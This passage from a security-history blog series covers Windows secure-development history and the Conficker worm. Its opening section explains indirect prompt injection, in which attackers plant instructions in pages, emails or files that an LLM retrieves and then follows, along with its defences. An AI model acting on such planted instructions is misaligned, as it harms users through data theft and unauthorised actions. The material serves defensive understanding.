&lt;p&gt;To bring this frontier to the same mechanism-grade depth as Frontier 1, the worked example below traces a single named vulnerability class -- &lt;strong&gt;Indirect Prompt Injection (IPI)&lt;/strong&gt; -- from primary disclosure through vendor mitigation, productization, federal-supplier profile, and a real-world CVE.&lt;/p&gt;

A class of attack against LLM-integrated applications in which the attacker never interacts with the model directly. Instead, the attacker plants adversarial instructions into data the model will later retrieve -- a web page the model browses, a document the model summarizes, an email the model is asked about, a code-repository file the model is asked to refactor. When the LLM ingests that data, it treats the injected instructions as part of its prompt context and acts on them. The term was defined by Greshake, Abdelnabi, Mishra, Endres, Holz, and Fritz in their AISec 23 paper [@greshake-ipi-arxiv] [@greshake-ipi-acm].
&lt;p&gt;&lt;strong&gt;The vulnerability class.&lt;/strong&gt; The Greshake et al. paper (arXiv v1 February 23, 2023; AISec 23 proceedings November 30, 2023, Copenhagen) demonstrated working IPI attacks against Bing Chat (GPT-4 powered), GPT-4-integrated synthetic applications, and code-completion engines [@greshake-ipi-arxiv]. The paper&apos;s threat taxonomy enumerates four families: data theft, worming (LLM-to-LLM propagation through injected outputs that subsequent LLMs read), information-environment contamination, and arbitrary code execution at the application-functionality layer [@greshake-ipi-arxiv] [@greshake-ipi-acm].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The vendor mitigation -- Microsoft Spotlighting.&lt;/strong&gt; Hines, Lopez, Hall, Zarfati, Zunger, and Kiciman published &quot;Defending Against Indirect Prompt Injection Attacks With Spotlighting&quot; (arXiv v1 March 20, 2024) [@hines-spotlighting-arxiv]. Spotlighting is a family of prompt-engineering techniques -- datamarking, encoding, per-token-marker transformations -- that, in the paper&apos;s words, provide &quot;a reliable and continuous signal of provenance&quot; so the model can distinguish instructions from retrieved data. The empirical claim is verbatim: &lt;strong&gt;&quot;spotlighting reduces the attack success rate from greater than 50% to below 2% in our experiments with minimal impact on task efficacy&quot;&lt;/strong&gt; on GPT-family models [@hines-spotlighting-arxiv].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The productization -- Azure AI Content Safety Prompt Shields.&lt;/strong&gt; Spotlighting moved from a research paper to a productized API surface: Microsoft Learn documents Prompt Shields as &quot;a unified API in Azure AI Content Safety that detects and blocks adversarial user input attacks on large language models&quot; [@azure-prompt-shields]. The Microsoft Docs Zero Trust SFI guidance documents the layered defense-in-depth pattern Prompt Shields and Spotlighting compose into: &quot;Prompt shields ... Spotlighting ... Plan drift detection ... Critic agents ... Tool chain analysis ... Security guardrails&quot; [@msdocs-defend-ipi]. MSRC&apos;s July 2025 blog &quot;How Microsoft defends against indirect prompt injection attacks&quot; is the canonical Microsoft narrative [@msrc-ipi-blog].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The framework mapping -- OWASP LLM01.&lt;/strong&gt; The OWASP GenAI Security Project&apos;s LLM01 page enumerates seven prevention-and-mitigation strategies for prompt injection [@owasp-llm01-prompt-injection]. Spotlighting is the algorithmic implementation of Category 6 (&quot;Segregate and identify external content&quot;); system-prompt enforcement is Category 1 (&quot;Constrain model behavior&quot;); tool-call permission scoping is Category 4 (&quot;Enforce privilege control and least privilege access&quot;); human-in-the-loop checkpoints for high-risk tool calls (file write, email send, payment) are Category 5 (&quot;Require human approval for high-risk actions&quot;) [@owasp-llm01-prompt-injection].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The federal-supplier profile -- NIST SP 800-218A IPD.&lt;/strong&gt; The draft NIST SP 800-218A profile takes the OWASP and Microsoft Research mitigation vocabulary and translates it into SSDF practice-level language [@nist-sp-800-218a-ipd] [@nist-sp-800-218a-ipd-pdf]. The legal anchor is Executive Order 14110 section 4.1(a)(ii) of October 30, 2023; the initial public draft published April 29, 2024 with a comment deadline of June 2, 2024 [@nist-sp-800-218a-ipd].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The real-world CVE -- CVE-2024-5184 (EmailGPT).&lt;/strong&gt; The OWASP LLM01 page Scenario #5 references CVE-2024-5184 directly. The NVD record classifies it as CWE-74 (Improper Neutralization, Injection) with CVSS Base Score 6.5 Medium; the CNA is Synopsys (Black Duck) [@nvd-cve-2024-5184]. The Black Duck CyRC advisory reconstructs the disclosure timeline: initial contact February 26, 2024; reminders April 4 and May 1; public advisory June 5, 2024 -- about ninety-nine days with &lt;strong&gt;no vendor response&lt;/strong&gt; [@blackduck-cyrc-emailgpt]. Mohammed Alshehri at Black Duck CyRC discovered the vulnerability; the CyRC recommendation, verbatim, is to &lt;strong&gt;&quot;remove the applications from networks immediately&quot;&lt;/strong&gt; [@blackduck-cyrc-emailgpt]. That recommendation is the operational evidence that the field still lacks a reliable in-band mitigation it can ship without removing the application from production.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Four gaps deserve naming for readers reusing this material. First, &lt;strong&gt;no primary-source-grade threat-modeling method exists&lt;/strong&gt; for the prompt-context, training-data-supply-chain, or fine-tuning-data attack surfaces in the closed-list way STRIDE exists for component-with-spec systems; OWASP LLM01&apos;s seven categories are a useful checklist but not a generative methodology. Second, &lt;strong&gt;Spotlighting&apos;s empirical 50%-to-2% reduction is per-model, per-task, and adversary-specific&lt;/strong&gt; [@hines-spotlighting-arxiv] -- tested against specific GPT-family models with specific attack templates. Third, &lt;strong&gt;the CVE-2024-5184 disclosure timeline (Feb 26 to Jun 5, 2024, no vendor response)&lt;/strong&gt; [@blackduck-cyrc-emailgpt] demonstrates the field still lacks the institutional analog of MSRC&apos;s 2002-era coordinated-disclosure norms for LLM-integrated applications. Fourth, &lt;strong&gt;the 2002-style cohort migration is not yet available&lt;/strong&gt;: there is no equivalent of &quot;ship telemetry, publish guidance, flip the default, deprecate, remove&quot; for &quot;prompt-injection-vulnerable LLM agent integrations,&quot; because the legitimate-use long tail is the entire space of LLM-integrated applications, not a single deprecated protocol like SMBv1.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Mapping the article&apos;s thesis onto this frontier: Greshake et al. named the &lt;strong&gt;class&lt;/strong&gt; (February 2023) the way Saltzer and Schroeder named the &lt;strong&gt;principles&lt;/strong&gt; in 1975; Microsoft published the &lt;strong&gt;mitigation&lt;/strong&gt; (Spotlighting, March 2024) with a measurable effect; Microsoft &lt;strong&gt;productized&lt;/strong&gt; it (Azure Prompt Shields); NIST published the &lt;strong&gt;federal-supplier profile&lt;/strong&gt; (SP 800-218A IPD, April 2024); and a &lt;strong&gt;real-world CVE with no vendor response&lt;/strong&gt; demonstrates the cycle has not yet completed at industry scale. The 2002 pattern -- discipline, then authority, then mitigation, then productization, then federal-supplier mandate, then coordinated-disclosure norm -- is &lt;em&gt;in progress&lt;/em&gt; for the AI/LLM frontier, and the reader can see exactly which steps remain.&lt;/p&gt;
&lt;h3&gt;Frontier 3: the formal-verification gap&lt;/h3&gt;
&lt;p&gt;The proof-of-correctness path has narrowed the gap between SOTA shipped code and the theoretical upper bound, but not closed it.&lt;/p&gt;
&lt;p&gt;The canonical worked example is &lt;strong&gt;seL4&lt;/strong&gt;: a formally verified microkernel, Klein et al., SOSP 2009 [@klein-sel4-sosp-2009]. The seL4 FAQ lists per-architecture kernel sizes for the verified configurations: roughly 10,000 source-lines-of-code on RISC-V 64, 12,100 on AArch32, 12,600 on AArch64 with hypervisor extensions, and 16,000 on x64 [@sel4-faq]. The proof-to-code ratio is approximately &lt;strong&gt;20 to 1&lt;/strong&gt; -- twenty lines of Isabelle/HOL proof for every line of kernel C -- and the proof effort was approximately twenty person-years for the original 2009 verification [@klein-sel4-sosp-2009].&lt;/p&gt;
&lt;p&gt;Why has seL4-class verification not scaled from a microkernel to a desktop OS? The barrier is compositional: each new feature requires re-proving every relevant invariant compositionally. The cost grows non-linearly with feature surface; even with two and a half decades of tooling improvement, no verified OS at desktop-Linux or Windows scale exists in production.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s parallel path -- the one running today, not over the next twenty years -- is the introduction of &lt;a href=&quot;https://paragmali.com/blog/rust-in-the-windows-kernel-a-field-guide-to-the-2024-2026-me/&quot; rel=&quot;noopener&quot;&gt;memory-safe Rust&lt;/a&gt; into selected Windows components. David Weston&apos;s BlueHat IL 2023 talk gave the two named exemplars: the Win32k GDI region engine (~36,000 lines of Rust) and DWriteCore (~152,000 lines of Rust) [@weston-bluehat-il-2023].&lt;/p&gt;
&lt;p&gt;Why does Rust help when seL4-style proof does not scale? Because Rust does not try to prove &quot;the program is correct.&quot; It enforces a weaker but mechanically checkable property at the type-system level: no aliased mutable borrows, no use-after-free. That weaker property closes most of the bug class behind the 70% memory-safety figure, by construction, at compile time -- without any per-program proof effort.&lt;/p&gt;
&lt;p&gt;That trade-off is the load-bearing engineering pattern of every secure-development framework since 2002. There is a name for it in the formal-methods literature, and a 1953 theorem behind it.&lt;/p&gt;

A mechanically checkable proxy property that closes the most common subset of an undecidable semantic property&apos;s bug class. Rice&apos;s theorem (Henry Rice, *Transactions of the AMS* 74, 1953) says any non-trivial semantic property of a Turing-recognizable program is undecidable -- you cannot, in general, write a checker that decides whether an arbitrary program has the property. The SDL&apos;s engineering workaround has always been to substitute a *decidable* property that catches the most common cases. `banned.h` substitutes &quot;is this textual symbol present?&quot; (trivially decidable, mechanically enforceable) for &quot;is this string copy memory-safe?&quot; (undecidable). C28719 is the descendant of that substitution that still release-gates Windows drivers in 2026 [@msft-c28719]. Rust&apos;s borrow-checker is the same trick at the language layer: it substitutes &quot;is every borrow either exclusive or shared?&quot; for &quot;is the program memory-safe?&quot;, closing a much larger class of bugs by construction.
&lt;p&gt;The unifying pattern across sections 7, 9, and 10:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Rice&apos;s theorem says the question we &lt;em&gt;want&lt;/em&gt; to answer is undecidable. The discipline that emerged from the 2002 Push said: substitute a question we &lt;em&gt;can&lt;/em&gt; answer, make the substitution good enough, and gate releases on the substituted question. Every generation since -- &lt;code&gt;banned.h&lt;/code&gt;, &lt;code&gt;strsafe.h&lt;/code&gt;, C28719, the Rust borrow-checker, SLSA Build attestations -- has substituted a better question.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The series this article opens has five more parts -- beginning with &lt;a href=&quot;https://paragmali.com/blog/eight-primitives-one-worm-the-windows-security-wars-part-2-2/&quot; rel=&quot;noopener&quot;&gt;Part 2 (2002-2008)&lt;/a&gt; -- each working a generation forward:&lt;/p&gt;

flowchart LR
    P1[Part 1: Wild West and TwC memo 1995-2002] --&amp;gt; P2[Part 2: XP SP2 DEP NX Windows Firewall WRP early ASLR Aug 2004]
    P2 --&amp;gt; P3[Part 3: Vista UAC MIC BitLocker PatchGuard driver signing Nov 2006]
    P3 --&amp;gt; P4[Part 4: Windows 7 to 10 AppContainer Credential Guard Device Guard 2009-2015]
    P4 --&amp;gt; P5[Part 5: Cloud era Azure AD Conditional Access Entra ID 2015-present]
    P5 --&amp;gt; P6[Part 6: Endpoint defenses HVCI VBS Pluton Rust in Windows 2018-2026]
&lt;p&gt;Mandatory Integrity Control (MIC) is a Windows Vista (2006) feature, not an NT-era latent design. Vista introduced integrity levels (Low, Medium, High, System) and the integrity-level-tagged DACLs that make MIC work; UAC builds on top. Part 3 of this series will work the mechanism in detail.&lt;/p&gt;
&lt;p&gt;For readers who want the mechanics rather than the history: this article is the institutional birth; the companion in-depth posts cover the primitives. The &lt;a href=&quot;https://paragmali.com/blog/windows-access-control-25-years-of-attacks/&quot; rel=&quot;noopener&quot;&gt;Windows access-control model&lt;/a&gt; post walks the SRM, DACLs, SACLs, and SIDs in operational detail; the &lt;a href=&quot;https://paragmali.com/blog/dpapi-and-dpapi-ng-the-credential-vault-under-everything/&quot; rel=&quot;noopener&quot;&gt;DPAPI&lt;/a&gt; post covers the user-key derivation pipeline; the &lt;a href=&quot;https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/&quot; rel=&quot;noopener&quot;&gt;NT Kerberos&lt;/a&gt; post covers the LSA, the KDC, the TGT, and the ticket-granting flow; the &lt;a href=&quot;https://paragmali.com/blog/the-card-that-wasnt-a-card-how-windows-authentication-outgre/&quot; rel=&quot;noopener&quot;&gt;smart cards&lt;/a&gt; post covers the certificate-bound credential path.&lt;/p&gt;
&lt;p&gt;The story ends, but the wars do not. The institutional pattern the era forced is now twenty-five years old; the bug class that forced it is still ~70% of shipped CVEs. The next twenty-five years will repeat the operationalization pattern at progressively more abstract layers -- supply chain, machine-learning model, the developer&apos;s autonomous agent. The hard part has never been the technical question. The hard part is always the executive willingness to halt feature work to answer it.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;
&lt;p&gt;Every retelling of this era invites a predictable set of pushbacks. Address them head-on, so the article can end on wonder, not on quibble.&lt;/p&gt;


No, and the cost-and-mechanism evidence is the rebuttal. The Push was approximately ten weeks of paused feature work across ~8,500 Windows engineers at a total cost of ~$100 million in foregone feature work, and the methodology survived twenty-plus years as the published Microsoft SDL, ISO/IEC 27034, OWASP SAMM, BSIMM, NIST SSDF, SLSA, and CISA Secure by Design [@howard-lipner-push-2003] [@washtech-microsoft-100m] [@msft-sdl-practices] [@iso-27034-1] [@owasp-samm-model] [@bsimm-home] [@nist-ssdf-218] [@slsa-home] [@cisa-secure-by-design]. A PR move does not survive a fiscal-quarter reporting cycle, let alone two decades and a peer-reviewed primary-source accounting in IEEE *Security and Privacy* [@howard-lipner-push-2003].

Partly. OpenBSD&apos;s audit-driven engineering culture started in the summer of 1996, six years before the Windows Security Push; its &quot;six to twelve&quot; auditor team has been continuously active since [@openbsd-security]. The OpenBSD slogan -- &quot;only two remote holes in the default install, in a heck of a long time&quot; -- is real and earned [@openbsd-security]. The distinction is scale and incentive: OpenBSD&apos;s model worked for a small homogeneous codebase with self-selected auditors and a permissive-license, no-revenue context; the SDL&apos;s model was built for a fifty-thousand-person, hundred-million-line, quarterly-revenue context. Parallel paths, not competitors.

No -- the eEye back-reference in their own August 4, 2001 Code Red II advisory points at advisory `AL20010717.html`, that is, **July 17, 2001**, for the original Code Red I discovery [@eeye-codered-ii]. CAIDA&apos;s measurement of the saturating Code Red v2 outbreak covers the **July 19, 2001** event with ~359,000 unique IPs in under fourteen hours [@caida-codered]. The defensible phrasings are &quot;mid-July 2001&quot; or &quot;July 17, 2001&quot; for Code Red I, and &quot;July 19, 2001&quot; for Code Red v2.

No. ILOVEYOU was a **VBScript / Windows Script Host email worm**, executed by `wscript.exe` when the user double-clicked the `LOVE-LETTER-FOR-YOU.TXT.vbs` attachment in Outlook [@cert-ca-2000-04-iloveyou]. The &quot;Concept / Melissa / ILOVEYOU&quot; grouping in popular retellings conflates two distinct execution surfaces: Office macros (Concept, Melissa) and the Windows scripting host (ILOVEYOU). The classification matters because the fixes are different -- Office macro auto-execute is an Office configuration; WSH-by-default and the hidden double-extension display in Explorer were Windows shell decisions.

No. The January 15, 2002 memo halted *Windows-division* feature work for the February-April 2002 Push, at the ~8,500-engineer scale Howard and Lipner document [@howard-lipner-push-2003]. The Office division, the .NET division, and the SQL Server division ran analogous pushes *serially* through 2002-2003, not simultaneously. The company-wide aggregate figure of &quot;10,000 engineers&quot; rolls those serial pushes together; the Windows-only number from the primary record is ~8,500 [@howard-lipner-push-2003] [@washtech-microsoft-100m]. Visual Studio .NET launched on schedule on February 13, 2002, after the December 2001 pre-launch security review the Gates memo names as the **template** for what the rest of the company was about to do [@gates-memo-wired].

Loren Kohnfelder and Praerit Garg, internal Microsoft memo &quot;The Threats to Our Products,&quot; dated April 1, 1999 -- nearly three years before the Gates memo [@shostack-tm-book]. The memo is **no longer hosted on Microsoft&apos;s own web site**, but it has been publicly preserved at Adam Shostack&apos;s archive [@shostack-stride-memo-archive] (Shostack&apos;s landing page notes the document is no longer available on Microsoft&apos;s web site, &quot;so we keep a copy here&quot;), with an independent mirror at FIRST&apos;s CTI SIG curriculum [@first-stride-memo-mirror]. The chain-of-custody analysis is Shostack&apos;s *Threat Modeling: Designing for Security*, Wiley 2014 [@shostack-tm-book]. Microsoft&apos;s current Threat Modeling Tool is the operational descendant [@msft-threat-modeling-tool]. STRIDE&apos;s existence is the strongest single piece of evidence that the article&apos;s literal thesis (&quot;Microsoft had no security team before January 15, 2002&quot;) needs the corrected reading in section 5 -- the methodology was *internal* by 1999; what was missing was the authority to require its use.

No, and the article explicitly disclaims this reading. The underlying ideas -- Saltzer and Schroeder 1975, the Orange Book 1985, CERT/CC 1988, OpenBSD 1996, Schneier&apos;s Attack Trees December 1999, Kohnfelder and Garg&apos;s STRIDE April 1999, Howard and LeBlanc&apos;s *Writing Secure Code* November 2001 -- all predate it [@saltzer-schroeder-1975] [@tcsec-orange-book] [@openbsd-security] [@schneier-attack-trees-1999] [@shostack-tm-book] [@howard-leblanc-wsc]. What January 15, 2002 was, is the moment a fifty-thousand-person desktop-monopoly vendor first applied release-blocking executive authority to make secure development a non-negotiable engineering gate. The corrected reading -- **industrial-scale operationalization at a dominant vendor**, not the *invention* of the field -- is the only one the evidence supports.

For readers who finish the article wanting to verify or extend the claims directly, the five most-useful primary sources cited throughout, by section:&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Section 6 (the memo).&lt;/strong&gt; Bill Gates, &quot;Trustworthy computing&quot; memo to &quot;Microsoft and Subsidiaries: All FTE,&quot; sent Tuesday, January 15, 2002 5:22 PM Pacific. Wired&apos;s republication preserves the original mail headers verbatim [@gates-memo-wired]; the Help With Windows mirror preserves the same &lt;code&gt;From:&lt;/code&gt; / &lt;code&gt;Sent:&lt;/code&gt; / &lt;code&gt;To:&lt;/code&gt; / &lt;code&gt;Subject:&lt;/code&gt; block [@helpwithwindows-billg].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Section 7 (the Push).&lt;/strong&gt; Michael Howard and Steve Lipner, &quot;Inside the Windows Security Push,&quot; IEEE &lt;em&gt;Security and Privacy&lt;/em&gt; 1(1):57-61, January-February 2003 [@howard-lipner-push-2003]. The primary-source paper for the approximately 8,500-engineer, approximately ten-week, approximately one-hundred-million-dollar, approximately 50% post-release-vulnerability-reduction numbers. DOI of record: &lt;code&gt;10.1109/MSECP.2003.1176996&lt;/code&gt;; IEEE Xplore is paywalled.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Section 4 (Code Red).&lt;/strong&gt; David Moore, Colleen Shannon, Jeffery Brown, &quot;Code-Red: a case study on the spread and victims of an Internet worm,&quot; CAIDA 2002 [@caida-codered]. The 359,000-host measurement.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Section 4 (Slammer).&lt;/strong&gt; David Moore, Vern Paxson, Stefan Savage, Colleen Shannon, Stuart Staniford, Nicholas Weaver, &quot;The Spread of the Sapphire/Slammer Worm,&quot; CAIDA / ICSI / Silicon Defense / UCSD / UC Berkeley 2003 [@caida-slammer]. The 8.5-second-doubling, ten-minute-saturation, approximately 75,000-host primary.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Section 10 (formal verification).&lt;/strong&gt; Gerwin Klein, Kevin Elphinstone, Gernot Heiser, et al., &quot;seL4: Formal Verification of an OS Kernel,&quot; SOSP 2009 [@klein-sel4-sosp-2009]. The formal-verification anchor; project FAQ at [@sel4-faq].&lt;/li&gt;&lt;/ul&gt;


&lt;p&gt;One sentence to carry forward, restating the article&apos;s load-bearing observation in plain English: the breakthrough was organizational, not technical. Same checklists, different signoff power. That pattern -- &quot;make existing methods mandatory, and gate releases on them&quot; -- is what every secure-development framework on the industry shelf in 2026 has, in its own vocabulary, copied. The next twenty-five years will copy it at the supply-chain layer, the machine-learning-model layer, and the autonomous-agent layer; the pattern is what travels.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-security-wars-part-1-trustworthy-computing&quot; keyTerms={[
  { term: &quot;Security Reference Monitor (SRM)&quot;, definition: &quot;The kernel component of Windows NT that performs the access check on a securable object.&quot; },
  { term: &quot;DACL&quot;, definition: &quot;Discretionary Access Control List: ordered ACEs granting or denying access rights to principals.&quot; },
  { term: &quot;SACL&quot;, definition: &quot;System Access Control List: the audit list, telling the kernel which access attempts to log.&quot; },
  { term: &quot;SID&quot;, definition: &quot;Security Identifier: a variable-length binary identifier naming a Windows principal.&quot; },
  { term: &quot;Macro virus&quot;, definition: &quot;A program that infects documents by hijacking the host application&apos;s embedded scripting language and auto-execute hooks.&quot; },
  { term: &quot;VBScript / Windows Script Host (WSH)&quot;, definition: &quot;Microsoft&apos;s general-purpose scripting language and the Windows executable host (wscript.exe / cscript.exe) that runs it.&quot; },
  { term: &quot;Monoculture&quot;, definition: &quot;A large population of independently administered hosts running identical software with identical defaults; a single vulnerability is exploitable across the entire population.&quot; },
  { term: &quot;banned.h&quot;, definition: &quot;Microsoft&apos;s header that re-declares unsafe C runtime functions as compile-time errors; surviving descendant in 2026 is the C28719 static-analysis warning.&quot; },
  { term: &quot;strsafe.h&quot;, definition: &quot;Microsoft&apos;s safer-by-default replacement string-handling API set with explicit destination-buffer sizes and HRESULT returns.&quot; },
  { term: &quot;Final Security Review (FSR)&quot;, definition: &quot;The release-blocking sign-off step at the end of the SDL pipeline; converts every preceding &apos;should&apos; into a hard &apos;must.&apos;&quot; },
  { term: &quot;Security Development Lifecycle (SDL)&quot;, definition: &quot;A software-engineering process model that integrates security activities into every phase of a product release.&quot; },
  { term: &quot;Decidable surrogate&quot;, definition: &quot;A mechanically checkable proxy property that closes the most common subset of an undecidable semantic property&apos;s bug class.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>security-history</category><category>sdl</category><category>trustworthy-computing</category><category>code-red</category><category>threat-modeling</category><category>malware-history</category><category>microsoft</category><category>The Windows Security Wars</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Eight Primitives, One Worm: The Windows Security Wars Part 2 (2002-2008)</title><link>https://paragmali.com/blog/eight-primitives-one-worm-the-windows-security-wars-part-2-2/</link><guid isPermaLink="true">https://paragmali.com/blog/eight-primitives-one-worm-the-windows-security-wars-part-2-2/</guid><description>How Microsoft re-engineered Windows around security between January 2002 and October 2009 -- and why a wormable RCE patched on October 23, 2008 still infected nine to fifteen million machines.</description><pubDate>Fri, 29 May 2026 00:00:00 GMT</pubDate><content:encoded>
Between Bill Gates&apos;s January 15, 2002 Trustworthy Computing memo and Windows 7&apos;s October 22, 2009 general availability, Microsoft executed the largest single security re-architecture in Windows&apos;s history -- and shipped most of it inside Windows Vista, one of the most poorly received consumer Windows releases ever made.&lt;p&gt;This is the story of what that re-architecture built (UAC, Mandatory Integrity Control, UIPI, ASLR, mandatory x64 driver signing, Service Hardening, BitLocker, the Windows Filtering Platform, Windows Resource Protection, and -- inherited from an April 2005 x64-only release that Vista did not introduce -- Kernel Patch Protection), and what Vista broke for compatibility and goodwill along the way.&lt;/p&gt;
&lt;p&gt;Then Conficker (late November 2008, twenty-nine days after the MS08-067 patch) proved that deployment velocity, not discovery latency, is the binding constraint on Internet security. Windows 7&apos;s polished re-release of substantially the same security architecture is the article&apos;s evidence that the user-hostility tax is payable -- if the work is done.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h2&gt;1. The Patch Was Already a Month Old&lt;/h2&gt;
&lt;p&gt;On Thursday, October 23, 2008, the Microsoft Security Response Center shipped MS08-067 out of band -- not on the next Patch Tuesday, because the analysts who triaged the bug believed a wormable exploit was weeks away, not months [@s-ms08-067]. They were right about the direction and wrong about the calendar. Roughly twenty-nine days later, anchored to November 20, 2008 in SRI International&apos;s technical analysis, Conficker.A began walking the IPv4 address space on TCP/445 [@s-sri-conficker-c-addendum]. Within four months the worm had infected somewhere between nine and fifteen million machines on a vulnerability whose patch had existed the entire time [@s-cwg-lessons-learned-2019].&lt;/p&gt;

The October 23, 2008 Microsoft Security Bulletin patching CVE-2008-4250, a stack buffer overflow in the path-handling code reachable through the Server service&apos;s `srvsvc` RPC interface on TCP/445 (and TCP/139 in NetBT environments). The bulletin text warns the vulnerability &quot;could be used in the crafting of a wormable exploit&quot; -- a prediction that Conficker.A confirmed twenty-nine days later [@s-ms08-067].

A Microsoft security update released outside the regular monthly Patch Tuesday cadence (the second Tuesday of the month). Microsoft reserves out-of-band releases for vulnerabilities whose risk profile -- active exploitation, imminent worm potential, or critical pre-authentication remote code execution -- does not survive the wait until the next monthly bulletin window [@s-msft-secupdates-index].
&lt;p&gt;This article is the story of what Microsoft built between January 15, 2002 (the Trustworthy Computing memo) and October 22, 2009 (Windows 7 general availability), the architectural and cultural costs of that build, and the operational lesson Conficker forced everyone to acknowledge.&lt;/p&gt;
&lt;p&gt;The architectural defenses that Trustworthy Computing produced -- Data Execution Prevention, Address Space Layout Randomization, the Windows Firewall on by default, Service Hardening, the integrity-level stack -- could only protect machines that ran the new code. The installed base did not run the new code. Server 2003 and Windows XP were still the working majority on TCP/445-reachable subnets in late 2008, and Vista&apos;s DEP and ASLR materially raised exploitation cost on Vista without raising it on the systems the worm actually walked.&lt;/p&gt;
&lt;p&gt;Confusing the October-2008 in-the-wild MS08-067 exploitation with Conficker is the most common single error in retellings of this period. The NVD entry for CVE-2008-4250 is explicit: the October-2008 in-the-wild exploitation was Gimmiv.A, a narrower non-self-propagating Trojan, not Conficker [@s-nvd-cve-2008-4250]. Conficker.A first appeared on the Internet on November 20, 2008 per SRI International [@s-sri-conficker-c-addendum].&lt;/p&gt;

sequenceDiagram
    autonumber
    participant MSRC as Microsoft Security Response Center
    participant SRV as Server service over TCP/445
    participant VISTA as Vista with DEP and ASLR
    participant XP as XP and Server 2003 installed base
    participant CONF as Conficker.A
    MSRC-&amp;gt;&amp;gt;SRV: Oct 23, 2008 out-of-band MS08-067 patch
    Note over MSRC,SRV: Bulletin warns &quot;wormable exploit&quot; possible
    SRV--&amp;gt;&amp;gt;XP: Patch must propagate via Automatic Updates or WSUS
    SRV--&amp;gt;&amp;gt;VISTA: Patch applied, DEP and ASLR raise exploit cost
    Note over XP,VISTA: Late October, in-the-wild Gimmiv.A Trojan uses CVE-2008-4250 narrowly
    CONF-&amp;gt;&amp;gt;XP: Nov 20, 2008 Conficker.A scans TCP/445 across IPv4
    Note over CONF,XP: Unpatched XP and Server 2003 are the dominant targets
    XP--&amp;gt;&amp;gt;CONF: Successful exploitation, lateral spread, DGA callback
    Note over CONF,XP: Jan to Apr 2009, 9 to 15 million infections worldwide
&lt;p&gt;By the end of the article you will be able to name every XP SP2 and Vista mitigation, the attack class it broke, the compatibility cost it imposed, and which Windows release inherited or smoothed it. You will know why the most important Trustworthy Computing lesson was not architectural at all -- it was operational.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The patch existed the entire time. Deployment did not. Every Trustworthy Computing mitigation in this article is a partial answer to the question &quot;what reaches the installed base on time?&quot; Conficker is the era&apos;s answer to the question &quot;what does not?&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How did we get from the Code Red era to a Trustworthy-Computing world where a wormable RCE could still infect millions? Start with one memo and a stand-down.&lt;/p&gt;
&lt;h2&gt;2. Where Part 1 Left Off&lt;/h2&gt;
&lt;p&gt;On the morning of January 16, 2002, the engineers who worked on Windows came back to work and could not check in code. Bill Gates&apos;s memo had gone out the previous afternoon and reading it took about eleven minutes. The order in the building was the simple part: stop everything, sit through retraining, do not commit until you can argue your changes against a threat model.&lt;/p&gt;
&lt;p&gt;The slower part was naming what had just happened. It was not a campaign. It was a directive that quietly changed the unit of work at Microsoft from &quot;ship the feature&quot; to &quot;ship the feature you can prove will not get someone exploited.&quot;&lt;/p&gt;
&lt;p&gt;The memo itself was the institutional charter for everything in this article. It opened in plain prose -- &quot;Every few years I have sent out a memo talking about the highest priority for the company&quot; -- and arrived at its load-bearing sentence in the fifth sentence of the first paragraph: &quot;Trustworthy Computing is the highest priority for all the work we are doing&quot; [@s-gates-twc-wired]. The line read in 2002 as a corporate goal-setting exercise. In retrospect it read as a contract.&lt;/p&gt;
&lt;p&gt;The Wired and CNET reproductions of the memo carry the same body but differ on the timestamp in the &quot;Sent:&quot; header. Wired records &quot;Sent: Tuesday, January 15, 2002 5:22 PM&quot; [@s-gates-twc-wired]; CNET&apos;s parallel reproduction shows &quot;Sent: Tuesday, January 15, 2002 2:22 PM&quot; [@s-gates-twc-cnet]. The three-hour delta is the Eastern-vs-Pacific wall-clock difference, consistent with Wired having an Eastern copy and CNET reproducing a Pacific one. The article renders the send time as &quot;2:22 PM Pacific / 5:22 PM Eastern.&quot;&lt;/p&gt;

Trustworthy Computing is the highest priority for all the work we are doing. -- Bill Gates, internal Microsoft memo, January 15, 2002 [@s-gates-twc-wired]
&lt;p&gt;The next two months turned the memo into engineering. From roughly February through March 2002, Microsoft ran the Windows security stand-down: approximately 8,500 Windows engineers were pulled off feature work to read Howard and LeBlanc&apos;s &lt;em&gt;Writing Secure Code&lt;/em&gt;, 2nd edition (Microsoft Press, 2002) [@s-howard-leblanc-wsc2e] and to be retrained on threat modeling, input validation, integer-overflow defense, secure default selection, and the privilege-reduction patterns the book named explicitly. Three Microsoft Press security titles served as the canonical training corpus for the next several years; &lt;em&gt;Writing Secure Code 2e&lt;/em&gt; was the one that lived on every desk.&lt;/p&gt;
&lt;p&gt;But the stand-down was a one-time event. The thing that had to outlast it was the process. The Trustworthy Computing Security Development Lifecycle, formally adopted as a mandatory company-wide engineering process in 2004 and described at the Annual Computer Security Applications Conference that December, is the right pivot to point to.&lt;/p&gt;
